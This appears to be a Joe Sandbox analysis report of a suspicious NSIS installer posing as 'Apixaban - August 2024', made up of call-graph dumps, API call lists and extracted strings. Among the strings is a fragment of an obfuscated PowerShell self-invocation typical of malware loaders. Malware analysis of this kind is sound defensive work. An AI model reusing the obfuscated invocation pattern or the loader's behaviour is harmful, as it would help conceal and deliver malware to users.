4219->4224 4220->4197 4220->4207 4221->4214 4233 404adc 4 API calls 4221->4233 4236 404f7f 4221->4236 4222->4234 4243 404162 SendMessageW 4223->4243 4242 404162 SendMessageW 4224->4242 4225->4217 4227 404d34 4225->4227 4230 404cb5 SendMessageW 4225->4230 4231 404cf1 SendMessageW 4225->4231 4232 404d02 SendMessageW 4225->4232 4226->4201 4227->4217 4227->4219 4230->4225 4231->4225 4232->4225 4233->4236 4234->4206 4235 405089 InvalidateRect 4235->4214 4237 40509f 4235->4237 4238 404fad SendMessageW 4236->4238 4239 404fc3 4236->4239 4240 404976 21 API calls 4237->4240 4238->4239 4239->4235 4241 405037 SendMessageW SendMessageW 4239->4241 4240->4214 4241->4239 4242->4234 4243->4199 4244 404910 4245 404920 4244->4245 4246 40493c 4244->4246 4255 4056a8 GetDlgItemTextW 4245->4255 4248 404942 SHGetPathFromIDListW 4246->4248 4249 40496f 4246->4249 4251 404959 SendMessageW 4248->4251 4252 404952 4248->4252 4250 40492d SendMessageW 4250->4246 4251->4249 4254 40140b 2 API calls 4252->4254 4254->4251 4255->4250 4256 401491 4257 405192 25 API calls 4256->4257 4258 401498 4257->4258 4259 402293 4260 402b38 18 API calls 4259->4260 4261 4022a2 4260->4261 4262 402b38 18 API calls 4261->4262 4263 4022ab 4262->4263 4264 402b38 18 API calls 4263->4264 4265 4022b5 GetPrivateProfileStringW 4264->4265 4266 401718 4267 402b38 18 API calls 4266->4267 4268 40171f SearchPathW 4267->4268 4269 40173a 4268->4269 4270 401f98 4271 401faa 4270->4271 4281 40205c 4270->4281 4272 402b38 18 API calls 4271->4272 4274 401fb1 4272->4274 4273 401423 25 API calls 4279 402195 4273->4279 4275 402b38 18 API calls 4274->4275 4276 401fba 4275->4276 4277 401fd0 LoadLibraryExW 4276->4277 4278 401fc2 GetModuleHandleW 4276->4278 4280 401fe1 4277->4280 4277->4281 4278->4277 4278->4280 4290 4062be WideCharToMultiByte 4280->4290 4281->4273 4284 401ff2 4287 401423 25 API calls 4284->4287 4288 402002 4284->4288 4285 40202b 4286 405192 25 API calls 4285->4286 4286->4288 4287->4288 4288->4279 4289 40204e FreeLibrary 4288->4289 4289->4279 4291 4062e8 GetProcAddress 4290->4291 4292 401fec 4290->4292 4291->4292 4292->4284 4292->4285 3693 40159b 3694 402b38 18 API calls 3693->3694 3695 4015a2 SetFileAttributesW 3694->3695 3696 4015b4 3695->3696 4293 40149e 4294 40223c 4293->4294 4295 4014ac PostQuitMessage 4293->4295 4295->4294 4296 40219e 4297 402b38 18 API calls 4296->4297 4298 4021a4 4297->4298 4299 402b38 18 API calls 4298->4299 4300 4021ad 4299->4300 4301 402b38 18 API calls 4300->4301 4302 4021b6 4301->4302 4303 40622b 2 API calls 4302->4303 4304 4021bf 4303->4304 4305 4021d0 lstrlenW lstrlenW 4304->4305 4306 4021c3 4304->4306 4307 405192 25 API calls 4305->4307 4308 405192 25 API calls 4306->4308 4310 4021cb 4306->4310 4309 40220e SHFileOperationW 4307->4309 4308->4310 4309->4306 4309->4310 4311 4029a0 SendMessageW 4312 4029c5 4311->4312 4313 4029ba InvalidateRect 4311->4313 4313->4312 4321 401b22 4322 401b73 4321->4322 4323 401b2f 4321->4323 4325 401b78 4322->4325 4326 401b9d GlobalAlloc 4322->4326 4324 402229 4323->4324 4330 401b46 4323->4330 4327 405f0a 18 API calls 4324->4327 4335 401bb8 4325->4335 4342 405ee8 lstrcpynW 4325->4342 4328 405f0a 18 API calls 4326->4328 4329 402236 4327->4329 4328->4335 4336 4056c4 MessageBoxIndirectW 4329->4336 4340 405ee8 lstrcpynW 4330->4340 4333 401b8a GlobalFree 4333->4335 4334 401b55 4341 405ee8 lstrcpynW 4334->4341 4336->4335 4338 401b64 4343 405ee8 lstrcpynW 4338->4343 4340->4334 4341->4338 4342->4333 4343->4335 4344 402222 4345 402229 4344->4345 4348 40223c 4344->4348 4346 405f0a 18 API calls 4345->4346 4347 402236 4346->4347 4349 4056c4 MessageBoxIndirectW 4347->4349 4349->4348 3272 401924 3273 401926 3272->3273 3274 402b38 18 API calls 3273->3274 3275 40192b 3274->3275 3278 405770 3275->3278 3317 405a3b 3278->3317 3281 405798 DeleteFileW 3288 401934 3281->3288 3283 4057af 3284 4058cf 3283->3284 3331 405ee8 lstrcpynW 3283->3331 3284->3288 3291 40622b 2 API calls 3284->3291 3285 4057d5 3286 4057e8 3285->3286 3287 4057db lstrcatW 3285->3287 3332 40597f lstrlenW 3286->3332 3289 4057ee 3287->3289 3292 4057fe lstrcatW 3289->3292 3294 405809 lstrlenW FindFirstFileW 3289->3294 3293 4058f4 3291->3293 3292->3294 3293->3288 3295 4058f8 3293->3295 3294->3284 3303 40582b 3294->3303 3296 405933 3 API calls 3295->3296 3297 4058fe 3296->3297 3299 405728 5 API calls 3297->3299 3298 4058b2 FindNextFileW 3301 4058c8 FindClose 3298->3301 3298->3303 3302 40590a 3299->3302 3301->3284 3304 405924 3302->3304 3305 40590e 3302->3305 3303->3298 3312 405873 3303->3312 3336 405ee8 lstrcpynW 3303->3336 3307 405192 25 API calls 3304->3307 3305->3288 3308 405192 25 API calls 3305->3308 3307->3288 3310 40591b 3308->3310 3309 405770 64 API calls 3309->3312 3311 405d82 40 API calls 3310->3311 3314 405922 3311->3314 3312->3298 3312->3309 3313 405192 25 API calls 3312->3313 3315 405192 25 API calls 3312->3315 3337 405728 3312->3337 3345 405d82 3312->3345 3313->3298 3314->3288 3315->3312 3350 405ee8 lstrcpynW 3317->3350 3319 405a4c 3351 4059de CharNextW CharNextW 3319->3351 3322 405790 3322->3281 3322->3283 3323 40617c 5 API calls 3326 405a62 3323->3326 3324 405a93 lstrlenW 3325 405a9e 3324->3325 3324->3326 3328 405933 3 API calls 3325->3328 3326->3322 3326->3324 3327 40622b 2 API calls 3326->3327 3330 40597f 2 API calls 3326->3330 3327->3326 3329 405aa3 GetFileAttributesW 3328->3329 3329->3322 3330->3324 3331->3285 3333 40598d 3332->3333 3334 405993 CharPrevW 3333->3334 3335 40599f 3333->3335 3334->3333 3334->3335 3335->3289 3336->3303 3338 405b2f 2 API calls 3337->3338 3339 405734 3338->3339 3340 405743 RemoveDirectoryW 3339->3340 3341 40574b DeleteFileW 3339->3341 3343 405755 3339->3343 3342 405751 3340->3342 3341->3342 3342->3343 3344 405761 SetFileAttributesW 3342->3344 3343->3312 3344->3343 3346 406252 3 API calls 3345->3346 3347 405d89 3346->3347 3349 405daa 3347->3349 3357 405c06 lstrcpyW 3347->3357 3349->3312 3350->3319 3352 4059fb 3351->3352 3353 405a0d 3351->3353 3352->3353 3354 405a08 CharNextW 3352->3354 3355 405960 CharNextW 3353->3355 3356 405a31 3353->3356 3354->3356 3355->3353 3356->3322 3356->3323 3358 405c55 GetShortPathNameW 3357->3358 3359 405c2f 3357->3359 3361 405c6a 3358->3361 3362 405d7c 3358->3362 3382 405b54 GetFileAttributesW CreateFileW 3359->3382 3361->3362 3364 405c72 wsprintfA 3361->3364 3362->3349 3363 405c39 CloseHandle GetShortPathNameW 3363->3362 3365 405c4d 3363->3365 3366 405f0a 18 API calls 3364->3366 3365->3358 3365->3362 3367 405c9a 3366->3367 3383 405b54 GetFileAttributesW CreateFileW 3367->3383 3369 405ca7 3369->3362 3370 405cb6 GetFileSize GlobalAlloc 3369->3370 3371 405d75 CloseHandle 3370->3371 3372 405cd8 3370->3372 3371->3362 3373 405bd7 ReadFile 3372->3373 3374 405ce0 3373->3374 3374->3371 3384 405ab9 lstrlenA 3374->3384 3377 405cf7 lstrcpyA 3380 405d19 3377->3380 3378 405d0b 3379 405ab9 4 API calls 3378->3379 3379->3380 3381 405d50 SetFilePointer WriteFile GlobalFree 3380->3381 3381->3371 3382->3363 3383->3369 3385 405afa lstrlenA 3384->3385 3386 405b02 3385->3386 3387 405ad3 lstrcmpiA 3385->3387 3386->3377 3386->3378 3387->3386 3388 405af1 CharNextA 3387->3388 3388->3385 4350 402727 4351 4029c5 4350->4351 4352 40272e 4350->4352 4353 402734 FindClose 4352->4353 4353->4351 4354 401cab 4355 402b1b 18 API calls 4354->4355 4356 401cb2 4355->4356 4357 402b1b 18 API calls 4356->4357 4358 401cba GetDlgItem 4357->4358 4359 4024e6 4358->4359 3697 40232f 3698 402335 3697->3698 3699 402b38 18 API calls 3698->3699 3700 402347 3699->3700 3701 402b38 18 API calls 3700->3701 3702 402351 RegCreateKeyExW 3701->3702 3703 402791 3702->3703 3704 40237b 3702->3704 3705 402396 3704->3705 3706 402b38 18 API calls 3704->3706 3707 4023a2 3705->3707 3714 402b1b 3705->3714 3708 40238c lstrlenW 3706->3708 3710 4023bd RegSetValueExW 3707->3710 3711 403060 46 API calls 3707->3711 3708->3705 3712 4023d3 RegCloseKey 3710->3712 3711->3710 3712->3703 3715 405f0a 18 API calls 3714->3715 3716 402b2f 3715->3716 3716->3707 4360 4016af 4361 402b38 18 API calls 4360->4361 4362 4016b5 GetFullPathNameW 4361->4362 4363 4016f1 4362->4363 4364 4016cf 4362->4364 4365 4029c5 4363->4365 4366 401706 GetShortPathNameW 4363->4366 4364->4363 4367 40622b 2 API calls 4364->4367 4366->4365 4368 4016e1 4367->4368 4368->4363 4370 405ee8 lstrcpynW 4368->4370 4370->4363 4371 406c30 4374 4063c1 4371->4374 4372 406442 GlobalFree 4373 40644b GlobalAlloc 4372->4373 4373->4374 4375 406d2c 4373->4375 4374->4372 4374->4373 4374->4374 4374->4375 4376 4064c2 GlobalAlloc 4374->4376 4377 4064b9 GlobalFree 4374->4377 4376->4374 4376->4375 4377->4376 4378 4027b3 4379 402b38 18 API calls 4378->4379 4380 4027c1 4379->4380 4381 4027d7 4380->4381 4382 402b38 18 API calls 4380->4382 4383 405b2f 2 API calls 4381->4383 4382->4381 4384 4027dd 4383->4384 4404 405b54 GetFileAttributesW CreateFileW 4384->4404 4386 4027ea 4387 402893 4386->4387 4388 4027f6 GlobalAlloc 4386->4388 4391 40289b DeleteFileW 4387->4391 4392 4028ae 4387->4392 4389 40288a CloseHandle 4388->4389 4390 40280f 4388->4390 4389->4387 4405 40330d SetFilePointer 4390->4405 4391->4392 4394 402815 4395 4032f7 ReadFile 4394->4395 4396 40281e GlobalAlloc 4395->4396 4397 402862 WriteFile GlobalFree 4396->4397 4398 40282e 4396->4398 4400 403060 46 API calls 4397->4400 4399 403060 46 API calls 4398->4399 4403 40283b 4399->4403 4401 402887 4400->4401 4401->4389 4402 402859 GlobalFree 4402->4397 4403->4402 4404->4386 4405->4394 4406 4028b4 4407 402b1b 18 API calls 4406->4407 4408 4028ba 4407->4408 4409 4028f6 4408->4409 4410 4028dd 4408->4410 4413 402791 4408->4413 4411 402900 4409->4411 4412 40290c 4409->4412 4414 4028e2 4410->4414 4419 4028f3 4410->4419 4415 402b1b 18 API calls 4411->4415 4416 405f0a 18 API calls 4412->4416 4420 405ee8 lstrcpynW 4414->4420 4415->4419 4416->4419 4419->4413 4421 405e2f wsprintfW 4419->4421 4420->4413 4421->4413 4422 4014b8 4423 4014be 4422->4423 4424 401389 2 API calls 4423->4424 4425 4014c6 4424->4425 3671 4015b9 3672 402b38 18 API calls 3671->3672 3673 4015c0 3672->3673 3674 4059de 4 API calls 3673->3674 3685 4015c9 3674->3685 3675 401614 3677 401646 3675->3677 3678 401619 3675->3678 3676 405960 CharNextW 3680 4015d7 CreateDirectoryW 3676->3680 3682 401423 25 API calls 3677->3682 3689 401423 3678->3689 3683 4015ed GetLastError 3680->3683 3680->3685 3688 40163e 3682->3688 3683->3685 3686 4015fa GetFileAttributesW 3683->3686 3685->3675 3685->3676 3686->3685 3687 40162d SetCurrentDirectoryW 3687->3688 3690 405192 25 API calls 3689->3690 3691 401431 3690->3691 3692 405ee8 lstrcpynW 3691->3692 3692->3687 4426 401939 4427 402b38 18 API calls 4426->4427 4428 401940 lstrlenW 4427->4428 4429 4024e6 4428->4429 4430 402939 4431 402b1b 18 API calls 4430->4431 4432 40293f 4431->4432 4433 402972 4432->4433 4434 40294d 4432->4434 4436 402791 4432->4436 4435 405f0a 18 API calls 4433->4435 4433->4436 4434->4436 4438 405e2f wsprintfW 4434->4438 4435->4436 4438->4436 4439 40653d 4441 4063c1 4439->4441 4440 406d2c 4441->4440 4442 406442 GlobalFree 4441->4442 4443 40644b GlobalAlloc 4441->4443 4444 4064c2 GlobalAlloc 4441->4444 4445 4064b9 GlobalFree 4441->4445 4442->4443 4443->4440 4443->4441 4444->4440 4444->4441 4445->4444 4446 40173f 4447 402b38 18 API calls 4446->4447 4448 401746 4447->4448 4449 405b83 2 API calls 4448->4449 4450 40174d 4449->4450 4450->4450

                                                Executed Functions

                                                Function 00403358 Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335stringfilecomCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 403358-4033ee #17 SetErrorMode OleInitialize call 406252 SHGetFileInfoW call 405ee8 GetCommandLineW call 405ee8 GetModuleHandleW 7 4033f0-4033f7 0->7 8 4033f8-40340a call 405960 CharNextW 0->8 7->8 11 4034d8-4034de 8->11 12 4034e4 11->12 13 40340f-403415 11->13 16 4034f8-403512 GetTempPathW call 403324 12->16 14 403417-40341c 13->14 15 40341e-403424 13->15 14->14 14->15 17 403426-40342a 15->17 18 40342b-40342f 15->18 26 403514-403532 GetWindowsDirectoryW lstrcatW call 403324 16->26 27 40356a-403584 DeleteFileW call 402dba 16->27 17->18 20 403435-40343b 18->20 21 4034c9-4034d4 call 405960 18->21 24 403455-40346c 20->24 25 40343d-403444 20->25 21->11 37 4034d6-4034d7 21->37 33 40349a-4034b0 24->33 34 40346e-403484 24->34 31 403446-403449 25->31 32 40344b 25->32 26->27 42 403534-403564 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403324 26->42 44 40361a-403629 call 4037c0 OleUninitialize 27->44 45 40358a-403590 27->45 31->24 31->32 32->24 33->21 36 4034b2-4034c7 33->36 34->33 39 403486-40348e 34->39 36->21 43 4034e6-4034f3 call 405ee8 36->43 37->11 40 403490-403493 39->40 41 403495 39->41 40->33 40->41 41->33 42->27 42->44 43->16 57 403725-40372b 44->57 58 40362f-40363f call 4056c4 ExitProcess 44->58 47 403592-40359d call 405960 45->47 48 40360a-403611 call 4038b2 45->48 62 4035d4-4035de 47->62 63 40359f-4035b0 47->63 56 403616 48->56 56->44 60 4037a8-4037b0 57->60 61 40372d-40374a call 406252 * 3 57->61 69 4037b2 60->69 70 4037b6-4037ba ExitProcess 60->70 90 403794-40379f ExitWindowsEx 61->90 91 40374c-40374e 61->91 65 4035e0-4035ee call 405a3b 62->65 66 403645-40365f lstrcatW lstrcmpiW 62->66 68 4035b2-4035b4 63->68 65->44 80 4035f0-403606 call 405ee8 * 2 65->80 66->44 72 403661-403677 CreateDirectoryW SetCurrentDirectoryW 66->72 74 4035b6-4035cc 68->74 75 4035ce-4035d2 68->75 69->70 77 403684-4036ad call 405ee8 72->77 78 403679-40367f call 405ee8 72->78 74->62 74->75 75->62 75->68 89 4036b2-4036ce call 405f0a DeleteFileW 77->89 78->77 80->48 100 4036d0-4036e0 CopyFileW 89->100 101 40370f-403717 89->101 90->60 96 4037a1-4037a3 call 40140b 90->96 91->90 94 403750-403752 91->94 94->90 98 403754-403766 GetCurrentProcess 94->98 96->60 98->90 107 403768-40378a 98->107 100->101 103 4036e2-403702 call 405d82 call 405f0a call 405663 100->103 101->89 102 403719-403720 call 405d82 101->102 102->44 103->101 115 403704-40370b CloseHandle 103->115 107->90 115->101
                                                APIs
                                                • #17.COMCTL32 ref: 00403377
                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403382
                                                • OleInitialize.OLE32(00000000), ref: 00403389
                                                  • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                  • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                  • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1
                                                  • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Apixaban - August 2024.exe",00000000), ref: 004033D9
                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Apixaban - August 2024.exe",00000020), ref: 00403400
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403509
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351A
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403526
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353A
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403542
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403553
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355B
                                                • DeleteFileW.KERNELBASE(1033), ref: 0040356F
                                                • OleUninitialize.OLE32(?), ref: 0040361F
                                                • ExitProcess.KERNEL32 ref: 0040363F
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp), ref: 0040364B
                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Apixaban - August 2024.exe",00000000,?), ref: 00403657
                                                • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403663
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366A
                                                • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) ",?), ref: 004036C4
                                                • CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036D8
                                                • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
                                                • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
                                                • ExitProcess.KERNEL32 ref: 004037BA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                • String ID: "C:\Users\user\Desktop\Apixaban - August 2024.exe"$';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) "$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                • API String ID: 4107622049-1147740043
                                                • Opcode ID: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
                                                • Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
                                                • Opcode Fuzzy Hash: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
                                                • Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E
                                                Function 004052D1 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 116 4052d1-4052ec 117 4052f2-4053bb GetDlgItem * 3 call 404162 call 404a2f GetClientRect GetSystemMetrics SendMessageW * 2 116->117 118 40547d-405484 116->118 139 4053d9-4053dc 117->139 140 4053bd-4053d7 SendMessageW * 2 117->140 120 405486-4054a8 GetDlgItem CreateThread FindCloseChangeNotification 118->120 121 4054ae-4054bb 118->121 120->121 123 4054d9-4054e3 121->123 124 4054bd-4054c3 121->124 128 4054e5-4054eb 123->128 129 405539-40553d 123->129 126 4054c5-4054d4 ShowWindow * 2 call 404162 124->126 127 4054fe-405507 call 404194 124->127 126->123 136 40550c-405510 127->136 133 405513-405523 ShowWindow 128->133 134 4054ed-4054f9 call 404106 128->134 129->127 131 40553f-405545 129->131 131->127 141 405547-40555a SendMessageW 131->141 137 405533-405534 call 404106 133->137 138 405525-40552e call 405192 133->138 134->127 137->129 138->137 145 4053ec-405403 call 40412d 139->145 146 4053de-4053ea SendMessageW 139->146 140->139 147 405560-40558b CreatePopupMenu call 405f0a AppendMenuW 141->147 148 40565c-40565e 141->148 155 405405-405419 ShowWindow 145->155 156 405439-40545a GetDlgItem SendMessageW 145->156 146->145 153 4055a0-4055b5 TrackPopupMenu 147->153 154 40558d-40559d GetWindowRect 147->154 148->136 153->148 158 4055bb-4055d2 153->158 154->153 159 405428 155->159 160 40541b-405426 ShowWindow 155->160 156->148 157 405460-405478 SendMessageW * 2 156->157 157->148 162 4055d7-4055f2 SendMessageW 158->162 161 40542e-405434 call 404162 159->161 160->161 161->156 162->162 163 4055f4-405617 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 162->163 165 405619-405640 SendMessageW 163->165 165->165 166 405642-405656 GlobalUnlock SetClipboardData CloseClipboard 165->166 166->148
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 00405330
                                                • GetDlgItem.USER32(?,000003EE), ref: 0040533F
                                                • GetClientRect.USER32(?,?), ref: 0040537C
                                                • GetSystemMetrics.USER32(00000015), ref: 00405384
                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
                                                • ShowWindow.USER32(?,00000008), ref: 00405420
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405441
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
                                                • GetDlgItem.USER32(?,000003F8), ref: 0040534E
                                                  • Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405493
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005265,00000000), ref: 004054A1
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054A8
                                                • ShowWindow.USER32(00000000), ref: 004054CC
                                                • ShowWindow.USER32(?,00000008), ref: 004054D1
                                                • ShowWindow.USER32(00000008), ref: 0040551B
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
                                                • CreatePopupMenu.USER32 ref: 00405560
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
                                                • GetWindowRect.USER32(?,?), ref: 00405594
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
                                                • OpenClipboard.USER32(00000000), ref: 004055F5
                                                • EmptyClipboard.USER32 ref: 004055FB
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
                                                • GlobalLock.KERNEL32(00000000), ref: 00405611
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405645
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405650
                                                • CloseClipboard.USER32 ref: 00405656
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 4154960007-366298937
                                                • Opcode ID: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
                                                • Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
                                                • Opcode Fuzzy Hash: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
                                                • Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69
                                                Function 00405F0A Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 412 405f0a-405f15 413 405f17-405f26 412->413 414 405f28-405f3e 412->414 413->414 415 405f44-405f51 414->415 416 406156-40615c 414->416 415->416 419 405f57-405f5e 415->419 417 406162-40616d 416->417 418 405f63-405f70 416->418 420 406178-406179 417->420 421 40616f-406173 call 405ee8 417->421 418->417 422 405f76-405f82 418->422 419->416 421->420 424 406143 422->424 425 405f88-405fc4 422->425 426 406151-406154 424->426 427 406145-40614f 424->427 428 4060e4-4060e8 425->428 429 405fca-405fd5 GetVersion 425->429 426->416 427->416 430 4060ea-4060ee 428->430 431 40611d-406121 428->431 432 405fd7-405fdb 429->432 433 405fef 429->433 435 4060f0-4060fc call 405e2f 430->435 436 4060fe-40610b call 405ee8 430->436 438 406130-406141 lstrlenW 431->438 439 406123-40612b call 405f0a 431->439 432->433 434 405fdd-405fe1 432->434 437 405ff6-405ffd 433->437 434->433 440 405fe3-405fe7 434->440 450 406110-406119 435->450 436->450 442 406002-406004 437->442 443 405fff-406001 437->443 438->416 439->438 440->433 446 405fe9-405fed 440->446 448 406040-406043 442->448 449 406006-40602c call 405db5 442->449 443->442 446->437 453 406053-406056 448->453 454 406045-406051 GetSystemDirectoryW 448->454 461 406032-40603b call 405f0a 449->461 462 4060cb-4060cf 449->462 450->438 452 40611b 450->452 458 4060dc-4060e2 call 40617c 452->458 